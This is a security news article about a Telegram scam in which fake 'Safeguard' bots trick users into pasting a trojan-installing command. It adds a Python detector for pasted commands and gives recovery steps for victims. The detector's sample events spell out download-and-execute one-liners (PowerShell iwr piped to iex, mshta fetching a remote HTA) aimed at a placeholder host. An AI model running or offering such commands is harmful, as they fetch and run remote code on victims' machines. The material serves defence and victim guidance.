Hackers steal digital assets and user accounts when many people don’t even realize it

How to lose your cryptocurrency in Telegram in two minutes? Anyone can become a victim

18.04.2025

Hackers have come up with a new way to steal cryptocurrency from users’ devices using fake security bots in Telegram. The attackers build social-engineering pretexts that push users into a malicious “Safeguard” bot, which imitates a legitimate verification bot. GetBlock AML Research explains how the scheme gains access to your cryptocurrency through Telegram.

How do they trap you?

The most common lures are fake airdrops and fake Telegram pages of popular crypto influencers. A user who tries to claim the free tokens or follow the influencer is told that they must first pass verification through the Safeguard bot.

One of the phishing groups under the guise of conducting an airdrop

Point of no return

Fake Safeguard bot to pass identification

All of the malicious functionality lives in the fake Safeguard bot. When the user opens it, the automatic verification fails with an error and the bot offers manual identification instead: it instructs the user to open the Windows command line, press Ctrl+V and press Enter.

A dialog box that copies a malicious command to the clipboard

Important: by the time the user sees this dialog box, a malicious command has already been placed on the clipboard. Nothing on the screen shows what was copied; Ctrl+V pastes it and Enter runs it. Executing it infects the device with a trojan built to steal cryptocurrency and the victim’s Telegram account. Never perform the actions described in such a dialog box, and treat any site or bot that asks you to paste something you did not type yourself into a command line as hostile.

A malicious command to infect a device that is copied to the clipboard

Once the trojan is running, the attackers have full remote access to the victim’s device and everything on it, including account sessions and the private keys of crypto wallets. The detailed functionality of such trojans has been deconstructed by the white-hat hacker Jose’s.
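As an added example (not code from the article or from GetBlock), the following Python sketch shows the detection side of the chain described above. A pasted “verification” command appears in endpoint process-creation telemetry as a shell or script host launched either from explorer.exe (a Run-dialog paste) or from an interactive cmd.exe (a paste into an already-open prompt, as the bot instructs), with a command line that fetches or decodes a second stage. The field names, the indicator strings and the sample events are constructed assumptions about ClickFix-style pastes in general, not the specific command shown in the article’s screenshot.

```python
"""Flag ClickFix-style pasted commands in process-creation events.

All indicators and sample records below are constructed assumptions about
what pasted downloader one-liners usually look like; they are not taken
from the article or from any specific campaign.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal shape of a Sysmon Event ID 1 / Windows 4688 record (assumed field set)."""
    parent_image: str
    image: str
    command_line: str


# Where a user-typed paste originates: the Run dialog / Start menu (explorer.exe)
# or an interactive command prompt (cmd.exe). Assumption, not from the article.
PASTE_LAUNCHERS = {"explorer.exe", "cmd.exe"}

# Interpreters and LOLBins a pasted one-liner is usually handed to (assumption).
PASTE_TARGETS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}

# Generic download / decode markers such pastes tend to carry (assumption).
MARKERS = {
    "remote url": re.compile(r"https?://", re.I),
    "powershell download/eval cmdlet": re.compile(
        r"\b(iwr|invoke-webrequest|iex|invoke-expression|downloadstring)\b", re.I),
    "encoded command": re.compile(
        r"(?:^|\s)-(?:e|en|enc|encodedcommand)\b|frombase64string", re.I),
    "lolbin downloader": re.compile(r"\b(mshta|certutil|bitsadmin|curl)(\.exe)?\b", re.I),
}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\Windows\\cmd.exe' -> 'cmd.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_indicators(ev: ProcessEvent) -> List[str]:
    """Return the marker names that match, or [] when the event is not suspicious."""
    if _basename(ev.parent_image) not in PASTE_LAUNCHERS:
        return []
    if _basename(ev.image) not in PASTE_TARGETS:
        return []
    return [name for name, rx in MARKERS.items() if rx.search(ev.command_line)]


def scan(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, List[str]]]:
    """Return (event, reasons) for every event with at least one indicator."""
    hits = []
    for ev in events:
        reasons = clickfix_indicators(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records; verify.example is a placeholder host
    # 0. Run-dialog paste: download a script and pipe it to iex
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell.exe -w hidden -c "iwr http://verify.example/check.ps1 | iex"'),
    # 1. Paste into an open prompt; the payload decodes to the harmless "$a=1"
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 "powershell.exe -nop -w hidden -enc JABhAD0AMQA="),
    # 2. Paste into an open prompt that hands a remote HTA to mshta
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://verify.example/v.hta"),
    # 3. User simply opens a command prompt from Start: no indicators
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    # 4. Scheduled script with a URL inside, but not launched from a paste surface
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS,
                 "powershell.exe -File C:\\ops\\sync.ps1 -Source http://intranet.example/feed"),
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {_basename(ev.parent_image)} -> {_basename(ev.image)}: "
              f"{', '.join(reasons)}")
        print(f"        {ev.command_line}")
```

The parent check is what separates this from ordinary admin activity: a scheduled task or a management agent that runs PowerShell with a URL is not a paste, and records 3 and 4 are left alone. A production rule should also require the three fields to come from the same process tree and should be tuned against the organisation’s own baseline of explorer-launched shells.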

Attackers promote the malicious bots through social networks, particularly X, and through celebrity accounts. For example, links to the Safeguard bot appear in the replies to posts by US President Donald Trump.

Trump’s fake meme coin airdrop on X

On-chain analysis

The attackers’ addresses identified during the malware research show that they managed to steal $1.2 million worth of cryptocurrency. The assets were routed through the Binance, HTX, FixedFloat, ChangeNow, eXch and Cryptomus exchanges for laundering.

Attackers’ addresses:

What to do if the device is infected

If you have followed the bot’s instructions and run the command, act quickly:

  1. Find another device that the attackers cannot have touched;
  2. From that clean device, create new wallets and move the cryptocurrency out of every wallet whose keys were on the infected machine; treat every seed phrase and private key that was ever stored on it as compromised;
  3. From the clean device, end all active sessions of your accounts (Telegram included), change their passwords and enable two-factor authentication (2FA);
  4. Install antivirus software on the infected device and run a full scan;
  5. Wipe and reinstall the operating system even if the scan reports the trojan removed; do not enter a seed phrase or password on that machine before then.

These steps do not guarantee full protection from the attackers, but they can prevent them from taking over your assets and accounts.
